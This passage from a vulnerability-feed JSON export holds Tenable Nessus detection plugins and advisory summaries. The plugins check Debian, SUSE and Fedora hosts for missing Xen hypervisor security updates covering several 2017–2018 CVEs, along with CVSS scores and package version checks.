reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libxenstore3.0\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-docs-4.1\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-hypervisor-4.1-amd64\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-hypervisor-4.1-i386\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-system-amd64\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-system-i386\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-utils-4.1\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xen-utils-common\", reference:\"4.1.6.lts1-14\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"xenstore-utils\", reference:\"4.1.6.lts1-14\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:49:13", "description": "This update for xen fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-8897: Prevent mishandling of debug exceptions on x86\n(XSA-260, bsc#1090820)\n\nHandle HPET timers in IO-APIC mode correctly to prevent malicious or\nbuggy HVM guests from causing a hypervisor crash or potentially\nprivilege escalation/information leaks (XSA-261, bsc#1090822)\n\nPrevent unbounded loop, induced by qemu allowing an attacker to\npermanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\nCVE-2018-10472: x86 HVM guest OS users (in certain configurations)\nwere able to read arbitrary dom0 files via QMP live insertion of a\nCDROM, in conjunction with specifying the target file as the backing\nfile of a snapshot (bsc#1089152).\n\nCVE-2018-10471: x86 PV guest OS users were able to cause a denial of\nservice (out-of-bounds zero write and hypervisor crash) via unexpected\nINT 80 processing, because of an incorrect fix for CVE-2017-5754\n(bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:3230-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-3230-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3230-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118304);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-8897\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:3230-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues.\n\nThese security issues were fixed :\n\nCVE-2018-8897: Prevent mishandling of debug exceptions on x86\n(XSA-260, bsc#1090820)\n\nHandle HPET timers in IO-APIC mode correctly to prevent malicious or\nbuggy HVM guests from causing a hypervisor crash or potentially\nprivilege escalation/information leaks (XSA-261, bsc#1090822)\n\nPrevent unbounded loop, induced by qemu allowing an attacker to\npermanently keep a physical CPU core busy (XSA-262, bsc#1090823)\n\nCVE-2018-10472: x86 HVM guest OS users (in certain configurations)\nwere able to read arbitrary dom0 files via QMP live insertion of a\nCDROM, in conjunction with specifying the target file as the backing\nfile of a snapshot (bsc#1089152).\n\nCVE-2018-10471: x86 PV guest OS users were able to cause a denial of\nservice (out-of-bounds zero write and hypervisor crash) via unexpected\nINT 80 processing, because of an incorrect fix for CVE-2017-5754\n(bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5754/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183230-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2c34e0db\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-841=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-debugsource-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.7.5_02-43.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T06:45:11", "description": "This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 32, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-14T00:00:00", "title": "SUSE SLES12 Security Update : xen (SUSE-SU-2018:1216-1) (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2017-5754", "CVE-2018-10472", "CVE-2018-8897"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:xen-tools-debuginfo", "p-cpe:/a:novell:suse_linux:xen-doc-html", "p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo", "p-cpe:/a:novell:suse_linux:xen-debugsource", "p-cpe:/a:novell:suse_linux:xen-tools-domU", "p-cpe:/a:novell:suse_linux:xen-libs-debuginfo", "p-cpe:/a:novell:suse_linux:xen-libs", "p-cpe:/a:novell:suse_linux:xen", "p-cpe:/a:novell:suse_linux:xen-tools"], "id": "SUSE_SU-2018-1216-1.NASL", "href": "https://www.tenable.com/plugins/nessus/109756", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1216-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109756);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/10 13:51:47\");\n\n script_cve_id(\"CVE-2017-5754\", \"CVE-2018-10471\", \"CVE-2018-10472\", \"CVE-2018-8897\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"SUSE SLES12 Security Update : xen (SUSE-SU-2018:1216-1) (Meltdown)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for xen fixes several issues. These security issues were\nfixed :\n\n - CVE-2018-8897: Prevent mishandling of debug exceptions\n on x86 (XSA-260, bsc#1090820)\n\n - Handle HPET timers in IO-APIC mode correctly to prevent\n malicious or buggy HVM guests from causing a hypervisor\n crash or potentially privilege escalation/information\n leaks (XSA-261, bsc#1090822)\n\n - Prevent unbounded loop, induced by qemu allowing an\n attacker to permanently keep a physical CPU core busy\n (XSA-262, bsc#1090823)\n\n - CVE-2018-10472: x86 HVM guest OS users (in certain\n configurations) were able to read arbitrary dom0 files\n via QMP live insertion of a CDROM, in conjunction with\n specifying the target file as the backing file of a\n snapshot (bsc#1089152).\n\n - CVE-2018-10471: x86 PV guest OS users were able to cause\n a denial of service (out-of-bounds zero write and\n hypervisor crash) via unexpected INT 80 processing,\n because of an incorrect fix for CVE-2017-5754\n (bsc#1089635).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1027519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1086039\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089152\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1089635\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090822\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1090823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10471/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-10472/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-8897/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181216-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?561d072a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2018-841=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2018-841=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2018-841=1\n\nSUSE Enterprise Storage 4:zypper in -t patch SUSE-Storage-4-2018-841=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-debugsource-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-doc-html-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-4.7.5_02-43.30.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"xen-tools-domU-debuginfo-4.7.5_02-43.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:18:32", "description": "Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 6.5, "vector": "AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-05-02T00:00:00", "title": "Fedora 27 : xen (2018-604574c943)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10471", "CVE-2018-10472"], "modified": "2018-05-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:27", "p-cpe:/a:fedoraproject:fedora:xen"], "id": "FEDORA_2018-604574C943.NASL", "href": "https://www.tenable.com/plugins/nessus/109519", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-604574c943.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109519);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-10471\", \"CVE-2018-10472\");\n script_xref(name:\"FEDORA\", value:\"2018-604574c943\");\n script_xref(name:\"IAVB\", value:\"2018-B-0057\");\n\n script_name(english:\"Fedora 27 : xen (2018-604574c943)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Information leak via crafted user-supplied CDROM [XSA-258] (#1571867)\nx86: PV guest may crash Xen with XPTI [XSA-259] (#1571878)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-604574c943\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 